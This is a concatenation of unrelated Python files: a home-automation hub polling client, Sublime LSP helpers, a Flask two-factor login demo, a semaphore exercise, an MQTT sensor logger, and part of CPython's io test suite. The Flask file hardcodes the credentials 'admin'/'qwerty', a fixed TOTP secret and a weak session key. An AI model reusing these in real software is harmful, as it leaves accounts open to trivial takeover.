self._password = password
self._poll_time = poll_time
self._read_timeout = timeout
self._open = True
self._lock = threading.RLock()
self._idx = -1 # Buffer index
self._read_cond = threading.Condition()
self._read_buffer = bytearray()
# Start threads
self._reader = threading.Thread(target=self._read_thread, daemon=True)
self._reader.stop = self.close
self._reader.start()
def __del__(self):
if self.is_open:
self.close()
@property
def is_open(self):
with self._lock:
return self._open
def close(self):
with self._lock:
self._open = False
def read(self, size=1):
with self._read_cond:
if len(self._read_buffer) < size:
self._read_cond.wait(self._read_timeout)
if len(self._read_buffer) >= size:
data = self._read_buffer[:size]
self._read_buffer = self._read_buffer[size:]
return data
else:
return bytes()
def write(self, data):
if not self.is_open:
return
try:
self._write(data)
except:
logger.error('Failed to connect to hub')
logger.trace(sys.exc_info()[0])
self.close()
def flush(self):
pass
def _get(self, path):
url = 'http://{}:{}{}'.format(self._host, self._port, os.path.join('/', path))
logger.trace('Fetching {}'.format(url))
if self._username and self._password:
res = requests.get(url, auth=(self._username, self._password))
else:
res = requests.get(url)
response = res.text
logger.trace('Got {}: {}'.format(res.status_code, response))
if res.status_code != 200:
self.close()
raise IOError('Could not fetch {}'.format(url))
return response
def _write(self, data):
with self._lock:
self._poll()
self._clear()
self._get('/3?{}=I=3'.format(binascii.hexlify(data).decode('utf-8')))
def _clear(self):
with self._lock:
self._get('/1?XB=M=1')
self._idx = 0
def _poll(self):
with self._lock:
xml = self._get('/buffstatus.xml')
bufstatus = xml.split('<BS>')[1].split('</BS>')[0].strip()
# Convert the buffer status to a buffer and an index
buf = binascii.unhexlify(bufstatus[:-2])
index = int(bufstatus[-2:], base=16)
if self._idx < 0:
self._idx = index
return
msg = bytes()
if index < self._idx:
after = buf[self._idx:]
before = buf[:index]
msg = after + before
else:
msg = buf[self._idx:index]
self._idx = index
with self._read_cond:
self._read_buffer.extend(msg)
self._read_cond.notifyAll()
def _read_thread(self):
while self.is_open:
try:
self._poll()
time.sleep(self._poll_time)
except:
self.close()
logger.error('Failed to connect to hub')
logger.trace(sys.exc_info()[0])
logger.trace('Exiting read thread')
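# Illustrative usage sketch (host, port, credentials and command bytes are hypothetical):
#   conn = HubConn('192.168.1.10', 25105, username='admin', password='hunter2')
#   conn.write(bytes.fromhex('02620102030f117f'))  # queue a raw command to the hub
#   reply = conn.read(9)                           # read buffered response bytes
#   conn.close()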
|
helpers.py
|
from LSP.plugin.core.typing import Any, Callable, Dict, List, Optional, Tuple
import os
import re
import sublime
import subprocess
import threading
StringCallback = Callable[[str], None]
SemanticVersion = Tuple[int, int, int]
def run_command_sync(
args: List[str], cwd: Optional[str] = None, extra_env: Optional[Dict[str, str]] = None
) -> Tuple[str, Optional[str]]:
"""
Runs the given command synchronously.
:returns: A two-element tuple with the returned value and an optional error. If running the command has failed, the
first tuple element will be empty string and the second will contain the potential `stderr` output. If the
command has succeeded then the second tuple element will be `None`.
"""
try:
env = None
if extra_env:
env = os.environ.copy()
env.update(extra_env)
output = subprocess.check_output(
args, cwd=cwd, shell=sublime.platform() == 'windows', stderr=subprocess.STDOUT, env=env)
return (decode_bytes(output).strip(), None)
except subprocess.CalledProcessError as error:
return ('', decode_bytes(error.output).strip())
def run_command_async(args: List[str], on_success: StringCallback, on_error: StringCallback, **kwargs: Any) -> None:
"""
Runs the given command asynchronously.
    On success calls the provided `on_success` callback with the value that the command has returned.
On error calls the provided `on_error` callback with the potential `stderr` output.
"""
def execute(on_success: StringCallback, on_error: StringCallback, args: List[str]) -> None:
result, error = run_command_sync(args, **kwargs)
on_error(error) if error is not None else on_success(result)
thread = threading.Thread(target=execute, args=(on_success, on_error, args))
thread.start()
def decode_bytes(data: bytes) -> str:
"""
Decodes provided bytes using `utf-8` decoding, ignoring potential decoding errors.
"""
return data.decode('utf-8', 'ignore')
def parse_version(version: str) -> SemanticVersion:
"""
Converts a version string to a version tuple (major, minor, patch).
:returns: The semantic version in form of a 3-element tuple.
"""
match = re.match(r'v?(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)(?:-.+)?', version)
if match:
major, minor, patch = match.groups()
return int(major), int(minor), int(patch)
else:
return 0, 0, 0
def version_to_string(version: SemanticVersion) -> str:
"""
Returns a string representation of a version tuple.
"""
return '.'.join([str(c) for c in version])
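# Illustrative behaviour (not part of the public API):
#   parse_version('v14.17.0')      -> (14, 17, 0)
#   parse_version('1.2.3-beta.1')  -> (1, 2, 3)
#   version_to_string((14, 17, 0)) -> '14.17.0'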
def log_and_show_message(message: str, additional_logs: Optional[str] = None, show_in_status: bool = True) -> None:
"""
Logs the message in the console and optionally sets it as a status message on the window.
:param message: The message to log or show in the status.
:param additional_logs: The extra value to log on a separate line.
:param show_in_status: Whether to briefly show the message in the status bar of the current window.
"""
print(message, '\n', additional_logs) if additional_logs else print(message)
if show_in_status:
sublime.active_window().status_message(message)
|
web.py
|
#!/usr/bin/env python3
from random import random
import threading
from flask import Flask
from flask import redirect
from flask import render_template
from flask import request
from flask import session
from flask import url_for
import pyotp
server_results = {}
def view():
if request.form:
if request.form.get('user') and request.form.get('pass'):
if (request.form.get('user') == 'admin'
and request.form.get('pass') == 'qwerty'):
session['secondfactor'] = True
else:
session['authenticated'] = False
session['secondfactor'] = False
elif request.form.get('token') and session.get('secondfactor', False):
totp = pyotp.TOTP('base32secret3232')
if totp.verify(request.form.get('token'), valid_window=3):
session['authenticated'] = True
else:
session['authenticated'] = False
session['secondfactor'] = False
else:
session['authenticated'] = False
session['secondfactor'] = False
return redirect(url_for('index'))
authenticated = session.get('authenticated', False)
secondfactor = session.get('secondfactor', False)
return render_template('index.html',
authenticated=authenticated,
secondfactor=secondfactor,
results=server_results)
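# Flow implemented by view() above: a correct user/pass POST ('admin'/'qwerty') only
# sets the 'secondfactor' session flag; a subsequent TOTP token POST (secret
# 'base32secret3232', accepted within +/-3 time steps) sets 'authenticated';
# any other input resets both flags.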
def main():
app = Flask(__name__)
app.add_url_rule('/', 'index', view_func=view, methods=['GET', 'POST'])
app.secret_key = 'development key ' + str(random())
app.run(port=5000, debug=False, use_reloader=False)
def start_server():
flask_thread = threading.Thread(target=main)
flask_thread.setDaemon(True)
flask_thread.start()
def update_server_data(data):
global server_results
server_results = data
if __name__ == "__main__":
main()
|
gatosratones.py
|
import threading
import time
ratones = 0
mutex = threading.Semaphore(1)
plato_disponible = threading.Semaphore(1)
torniquete = threading.Semaphore(1)
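# Synchronisation sketch: `mutex` protects the `ratones` counter, `plato_disponible`
# is the shared dish (held by the mice as a group, lightswitch-style), and
# `torniquete` is a turnstile a cat holds so that no new mice enter while it waits
# to eat.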
def gato(num):
global ratones
    print "Cat %d is in the house" % num
torniquete.acquire()
if ratones >= 1:
        print "There are %d mice in the house!" % ratones
gato_come_raton(num)
ratones = ratones - 1
plato_disponible.acquire()
gato_come(num)
    print "I am cat %d and I am done eating" % num
plato_disponible.release()
torniquete.release()
def raton(num):
global ratones
torniquete.acquire()
torniquete.release()
    print "Mouse %d is in the house" % num
mutex.acquire()
ratones = ratones + 1
if ratones == 1:
plato_disponible.acquire()
mutex.release()
raton_come(num)
mutex.acquire()
ratones = ratones - 1
if ratones == 0:
plato_disponible.release()
    print "I am mouse %d and I am done eating" % num
mutex.release()
def gato_come(num):
    print "Cat %d is approaching" % num
    print "Cat %d: eating..." % num
time.sleep(1)
def raton_come(num):
    print "Mouse %d eating.........." % num
time.sleep(7)
def gato_come_raton(num):
    print "Cat %d ate a mouse" % num
def lanza_raton():
for i in range(30):
threading.Thread(target=raton, args=[i]).start()
time.sleep(0.3)
def lanza_gato():
for i in range(30):
threading.Thread(target=gato, args=[i]).start()
time.sleep(5)
threading.Thread(target=lanza_gato).start()
threading.Thread(target=lanza_raton).start()
|
logger.py
|
import collections, threading, traceback
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from pms5003 import PMS5003
from enviroplus import gas
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix, use_pms5003, num_samples, retain):
self.bme280 = BME280()
self.prefix = prefix
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.samples = collections.deque(maxlen=num_samples)
self.latest_pms_readings = {}
if use_pms5003:
self.pm_thread = threading.Thread(target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
self.retain = retain
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
        If the sensor is not polled continuously then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"particulate/1.0": pm_data.pm_ug_per_m3(1.0, atmospheric_environment=True),
"particulate/2.5": pm_data.pm_ug_per_m3(2.5, atmospheric_environment=True),
"particulate/10.0": pm_data.pm_ug_per_m3(None, atmospheric_environment=True),
}
except:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def take_readings(self):
gas_data = gas.read_all()
readings = {
"proximity": ltr559.get_proximity(),
"lux": ltr559.get_lux(),
"temperature": self.bme280.get_temperature(),
"pressure": self.bme280.get_pressure(),
"humidity": self.bme280.get_humidity(),
"gas/oxidising": gas_data.oxidising,
"gas/reducing": gas_data.reducing,
"gas/nh3": gas_data.nh3,
}
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value, retain):
topic = self.prefix.strip("/") + "/" + topic
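        # e.g. a prefix of "enviro/office" (hypothetical) and topic "temperature"
        # publish to the MQTT topic "enviro/office/temperature"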
self.client.publish(topic, str(value), retain=retain)
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
value_sum = sum([d[topic] for d in self.samples])
value_avg = value_sum / len(self.samples)
self.publish(topic, value_avg, retain=self.retain)
self.client.loop()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as a attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import os
import sys
import time
import array
import random
import unittest
import weakref
import abc
import signal
import errno
import warnings
import pickle
from itertools import cycle, count
from collections import deque
from test import support
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
self.assertRaises(TypeError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OSX this test consumes large resources; it takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
if not support.is_resource_enabled("largefile"):
print("\nTesting large file ops skipped on %s." % sys.platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def test_flush_error_on_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
def bad_flush():
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
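# Roughly (an assumption about the default implementation, not something this
# test asserts directly): read(n) allocates a bytearray(n), fills it via
# readinto(), and returns None when readinto() returns None -- which is how
# the EWOULDBLOCK-style None values from the mock propagate below.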
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
pass
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_no_fileno(self):
# XXX will we always have a fileno() method? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_flush_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
